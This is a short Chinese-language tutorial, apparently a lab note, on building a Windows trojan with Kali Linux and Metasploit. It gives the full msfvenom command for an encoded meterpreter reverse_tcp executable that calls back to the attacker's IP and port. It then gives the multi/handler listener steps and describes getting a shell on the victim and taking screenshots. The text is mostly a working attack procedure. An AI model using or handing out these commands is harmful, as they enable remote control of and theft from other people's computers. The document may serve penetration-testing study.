系统:kali,ip:192.168.43.16
所有需要输入的命令均在< >中
打开终端;
使用<ifconfig>查看自己的ip
使用命令生成木马程序
<msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '0x00' LHOST=192.168.43.16 LPORT=4444 -f exe > ks.exe>
windows/meterpreter/reverse_tcp(利用windows/meterpreter/reverse_tcp漏洞)
-e x86/shikata_ga_nai(靶机win10是64位,所以应选择对应的编码格式否则,可执行文件再次打开时会出现错误)
-i 5 (代表编码次数为5次)
-b '0x00' (避免出现的值)
LHOST=192.168.43.16 (设置本机也就是kali的ip)
LPORT=4444(设置端口,因为默认端口为4444所以我也填写的4444)
-f exe (生成exe的可执行文件)
>ks.exe(生成的文件名为ks.exe)
此处可以看到生成的文件有7KB左右大小
下一步要找到生成的文件,可以使用ls查看当前目录,找到目标文件<ls>
打开metaploit,msfconsole
<msfconsole>
打开监听模块
<use multi/handler>
加载一枚payload,
<set payload windows/meterpreter/reverse_tcp>
可以使用show options查看需要设置的参数
<show options>
可以看到,我们需要设置lhost
set lhost 192.168.43.16(此处为kali的ip)
<set lhost 192.168.43.16>
运行监听模块
<exploit>
此时,只要在靶机中运行木马程序,就会反弹会话,使用shell命令拿到shell(出现metepreter就表示已经反弹会话了)
此时可以看到已经进入目标主机,可以打开目标主机的命令操作目标主机,也可以在meterpreter会话端进行各种操作,(例如screenshot截取目标主机此时屏幕),后面会再搜索一下meterpreter会话端的命令进行总结。